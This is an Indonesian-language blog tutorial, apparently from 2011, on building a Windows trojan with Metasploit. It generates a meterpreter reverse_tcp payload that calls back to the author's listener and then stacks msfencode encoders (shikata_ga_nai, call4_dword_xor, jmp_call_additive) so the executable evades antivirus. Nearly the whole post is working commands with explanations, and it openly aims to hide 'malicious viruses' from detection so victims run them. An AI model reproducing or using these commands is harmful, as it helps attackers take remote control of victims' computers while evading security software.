Searching...
November 16, 2011
Wednesday, November 16, 2011

[ENCODING] Membuat Trojan Dengan Metasploit Extension

Kali ini saya akan memberikan sedikit pengarahan untuk membuat payload trojan dengan msfpayload lalu meng-encoding-nya dengan msfencode.

Preparation:
1. msfpayload



2. msfencode



Note: Dengan menginstall Metasploit, berarti kamu telah memiliki kedua requirements di atas.

Walkthrough:

Kali ini saya akan membuat payload trojan untuk melakukan interaksi dengan metasploit milik saya. IP address saya 10.21.0.232, dan Metasploit saya melakukan listening trojan pada port 4444.Buka terminal, lalu masukan perintah:root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 X > /tmp/trojan1.exe

Keterangan:
Trojan diatas berfungsi untuk:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File di beri nama trojan1.exe pada direktori /tmp/


Ini adalah payload standar tanpa encoding, dan sangat mudah dikenali antivirus sebagai virus trojan. Untuk itu, kita akan melakukan encoding virus dengan bantuan msfencode.

Buka terminal lagi, lalu masukan perintah:

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/trojan2.exe



Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
5. msfencode melakukan encoding dengan format ektensi .exe
6. File di beri nama trojan2.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -t exe > /tmp/trojan3.exe



Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. msfencode melakukan encoding dengan format ektensi .exe
8. File di beri nama trojan3.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -t exe > /tmp/trojan3.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode melakukan encoding dengan format ektensi .exe
9. File di beri nama trojan3.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t exe > /tmp/trojan4.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode melakukan encoding dengan format ektensi .exe
10. File di beri nama trojan4.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -t exe > /tmp/trojan6.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload  dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. msfencode melakukan encoding dengan format ektensi .exe
12. File di beri nama trojan6.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/trojan7.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload  dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama trojan4.exe pada direktori /tmp/

Sampai sejauh ini, virus-virus jahat kita sudah bersembunyi dengan baik di balik amplop yang dibuat pada encoder. Dan jika masih terseteksi, kamu bisa menggunakan encoder lain, mengkombinasikan encoder, meningkatkan banyaknya encoding yang dilakukan, atau memilih payload lain.

Created by:
red-dragon

Supported by:
Blue Dragon

Loced By:
Yoshephine Handini

5 comment:

Post a Comment

 
Back to top!